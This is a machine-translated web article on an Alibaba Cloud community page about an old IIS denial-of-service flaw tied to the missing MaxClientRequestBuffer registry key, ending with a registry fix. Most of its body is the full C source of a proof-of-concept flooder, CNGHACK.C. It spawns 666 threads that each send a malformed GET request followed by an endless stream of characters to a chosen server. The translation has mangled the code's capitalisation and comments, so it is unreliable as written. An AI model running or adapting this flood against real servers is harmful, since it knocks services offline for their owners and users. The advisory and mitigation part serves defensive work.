ASP Vulnerability Analysis and resolution (5)

Source: Internet
Author: User
Tags exit iis printf sleep socket strlen
Resolve the IIS Web server DOS

Vulnerability Description:
By default, IIS is vulnerable to denial of service attacks. If a key called "MaxClientRequestBuffer" has not been created in the registry, this NT system
The attacks of the EC usually work. The "MaxClientRequestBuffer" key is used to set the amount of input that IIS is allowed to accept. If "MaxClientRequestBuffer"
Set to 256 (bytes), the attacker requests IIS to be limited to 256 bytes by entering a large number of characters. The default setting of the system does not limit this, so use
The following procedure. You can easily implement a DOS attack on IIS server:

#include <stdio.h>
#include <windows.h>
#define Max_thread 666
void CNG ();
Char *server;
Char *buffer;
int port;
int counter = 0;
int current_threads = 0;
int main (int argc, char **argv)
{
WORD Tequila;
Wsadata data;
int p;
DWORD Tid;
HANDLE hthread[2000];
This code is as and sucks as it is. Won ' t exit correctly and a lot
Of the other fun things.
That I didn ' t want to take of the time. So just CTRL + C out of the
Code.
Load up Cnghack.exe 3 charm.
printf ("CNG IIS dos.\nmarc@eeye.com\nhttp://www.eeye.com\n\" for my
Beloved.\ "\ n");
if (argc<2) {
printf ("Usage:%s [Server] [port]\n", argv[0]);
Exit (1);
}
Buffer=malloc (17500);
memset (buffer, ' A ', strlen (buffer));
SERVER=ARGV[1];
Port=atoi (argv[2]);
Tequila = Makeword (1, 1);
printf ("Attempting to start Winsock ...") ");
if ((WSAStartup (Tequila, &data))!=0) {
printf ("Failed to start winsock.\n");
Exit (1);
}
else{
printf ("Started winsock.\n\n");
}

Counter = 0;
for (p = 0; p < max_thread; ++p) {
Hthread[counter] = CreateThread (0,
0,
(Lpthread_start_routine) CNG,
(void *) ++counter,
0,
&tid);
}
Sleep (250);
while (current_threads)
Sleep (250);
Counter = 0;
printf ("terminated threads.\n");
while (Counter < Max_thread)
{
TerminateThread (Hthread[counter], 0);
++counter;
}
WSACleanup ();
return 0;
}

void CNG ()
{
int sockfd=0, p;
struct sockaddr_in dstsain;
Char getkilled[]= "get/http/\r\n";
int die=1;
printf ("entered cng\n");
++current_threads;
dstsain.sin_family = af_inet;
Dstsain.sin_port = htons ((u_short) port);
DSTSAIN.SIN_ADDR.S_ADDR=INET_ADDR (server);
if ((SOCKFD = socket (af_inet, sock_stream, 0)) < 0) {
printf ("Failed to create socket\n");
--current_threads;
Return
}
if (!connect (SOCKFD, struct sockaddr *) &dstsain, sizeof (Dstsain)))
{
P=send (Sockfd,getkilled,strlen (getkilled), 0);
printf ("Step 1:%i\n", p);
for (;;) {
P=send (Sockfd,buffer,strlen (buffer), 0);
printf ("P:%i\n", p);
Put in some code to check if send =-1 more then X times we drop
The loop and exit the thread
Bla bla bla I love the dirtiness of concept code.
}
}
--current_threads;
printf ("exited cng\n");
Return
}

CNGHACK.C works by doing the following:
Connects to example.com
Sends:get/http/[return][buffer]

Where:
[Return] are just an \ r \ n
[Buffer] is a never ending stream of a ' s

The attack result will result in the NT system's CPU occupancy rate reaching 100%

Solution
Run Regedt32.exe
In: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W3SVC\Parameters
Add a value:
Value Name:maxclientrequestbuffer
Data Type:reg_dword
Set to Decimal
The specified value is set to the maximum length of the URL that you want to allow for IIS to accept.
CNNs is set to 256



Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.